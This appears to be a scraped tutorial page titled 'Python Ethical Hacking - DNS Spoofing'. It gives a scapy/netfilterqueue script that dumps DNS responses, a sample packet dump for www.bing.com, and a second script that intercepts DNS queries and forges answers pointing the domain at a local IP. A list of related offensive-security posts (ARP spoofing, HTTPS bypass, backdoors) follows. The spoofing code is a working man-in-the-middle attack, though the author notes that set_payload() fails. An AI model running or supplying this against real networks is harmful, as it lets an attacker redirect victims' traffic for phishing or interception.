What is DNS Spoofing

Sniff the DNSRR packet and show on the terminal.

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import DNSRR,IP

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSRR):

        print(scapy_packet.show())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Analyze the following DNSRR records.

###[ IP ]###

  version   = 4

  ihl       = 5

  tos       = 0x0

  len       = 218

  id        = 0

  flags     = DF

  frag      = 0

  ttl       = 64

  proto     = udp

  chksum    = 0x25e8

  src       = 10.0.0.1

  dst       = 10.0.0.43

  \options   \

###[ UDP ]###

     sport     = domain

     dport     = 42647

     len       = 198

     chksum    = 0x9388

###[ DNS ]###

        id        = 40073

        qr        = 1

        opcode    = QUERY

        aa        = 0

        tc        = 0

        rd        = 1

        ra        = 1

        z         = 0

        ad        = 0

        cd        = 0

        rcode     = ok

        qdcount   = 1

        ancount   = 3

        nscount   = 1

        arcount   = 0

        \qd        \

         |###[ DNS Question Record ]###

         |  qname     = 'www.bing.com.'

         |  qtype     = AAAA

         |  qclass    = IN

        \an        \

         |###[ DNS Resource Record ]###

         |  rrname    = 'www.bing.com.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 2063

         |  rdlen     = None

         |  rdata     = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 414

         |  rdlen     = None

         |  rdata     = 'cn.cn-0001.cn-msedge.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'cn.cn-0001.cn-msedge.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  rdata     = 'cn-0001.cn-msedge.net.'

        \ns        \

         |###[ DNS SOA Resource Record ]###

         |  rrname    = 'cn-msedge.net.'

         |  type      = SOA

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  mname     = 'ns1.cn-msedge.net.'

         |  rname     = 'msnhst.microsoft.com.'

         |  serial    = 2017032701

         |  refresh   = 1800

         |  retry     = 900

         |  expire    = 2419200

         |  minimum   = 240

        ar        = None

Redirecting DNS Responses

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import *

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSQR):

        qname = scapy_packet[DNSQR].qname

        if "www.bing.com" in qname.decode(errors='ignore'):

            print("[+] Spoofing target")

            answer = DNSRR(rrname=qname, rdata="10.0.0.43")

            scapy_packet[DNS].an = answer

            scapy_packet[DNS].ancount = 1

            del scapy_packet[IP].len

            del scapy_packet[IP].chksum

            del scapy_packet[UDP].chksum

            del scapy_packet[UDP].len

            packet.set_payload(str(scapy_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

The set_payload() method does not work....

https://github.com/kti/python-netfilterqueue/issues/30

Python Ethical Hacking - DNS Spoofing的更多相关文章

  1. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  2. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  4. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  5. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  6. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  7. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  8. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

  9. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

随机推荐

  1. Laravel模板引擎Blade中section的一些标签的区别介绍

    Laravel 框架中的 Blade 模板引擎,很好用,但是在官方文档中有关 Blade 的介绍并不详细,有些东西没有写出来,而有些则是没有说清楚.比如,使用中可能会遇到这样的问题: 1.@yield ...

  2. .NET 5 尝鲜 - 开源项目TerminalMACS WPF管理端支持.NET 5

    .NET 5 尝鲜 - 开源项目TerminalMACS WPF管理端支持.NET 5 一个使用 Prism 作为模块化框架.基于多个开源控件库作为UI控件选择.集成开源 UI 界面设计的 .NET ...

  3. 拿来即用:用C+JS结构来处理JSON数据

    [面对的问题] 在物联网产品的开发过程中,对JSON格式的数据处理是一个强需求,例如亚马逊的 AWS IOT平台,设备与后台之间的通讯数据都是JSON格式,先瞄一眼大概的样子: 这是一个真实产品的通讯 ...

  4. 多线程高并发编程(12) -- 阻塞算法实现ArrayBlockingQueue源码分析(1)

    一.前言 前文探究了非阻塞算法的实现ConcurrentLinkedQueue安全队列,也说明了阻塞算法实现的两种方式,使用一把锁(出队和入队同一把锁ArrayBlockingQueue)和两把锁(出 ...

  5. Java wait 和 sleep 的区别

    一.区别 sleep 来自 Thread 类,和 wait 来自 Object 类 sleep 方法没有释放锁,而wait方法释放了锁,使得其他线程可以使用同步控制块或方法 wait,notify和 ...

  6. 源码剖析@contextlib.contextmanager

    示例 @contextlib.contextmanager def result(a): print('before') yield print('after') 外层装饰源码 包装func函数,真实 ...

  7. Nginx 从入门到放弃(一)

    Nginx nginx的使用场景 静态资源服务 通过本地文件系统提供服务 反向代理服务 nginx的强大性能 缓存 负载均衡 API服务 OpenResty nginx优点 高并发.高性能 可扩展性好 ...

  8. 浅谈hash

    hash 算法介绍 hash说得通俗一点,就是给一个变量编上一个马甲 比如说一个人聪明可爱,举世无双,天资聪慧.活泼机灵...,那么就是叫我了(真不要脸 但是这样是不是显得些许麻烦? 于是人类发明了名 ...

  9. Data types 'int' and 'float'

    The type int means that the variables listed are integers; by contrast with float, which means float ...

  10. day01微信小程序

    一.基本概要 1.一个程序接口,可以集成很多功能,也就是在程序上再次开发 腾讯:微信+小程序 阿里:支付宝  +小程序 小程序的使用量很多 2.为什么要微信小程序? 1.微信用户群体大 2.容易推广, ...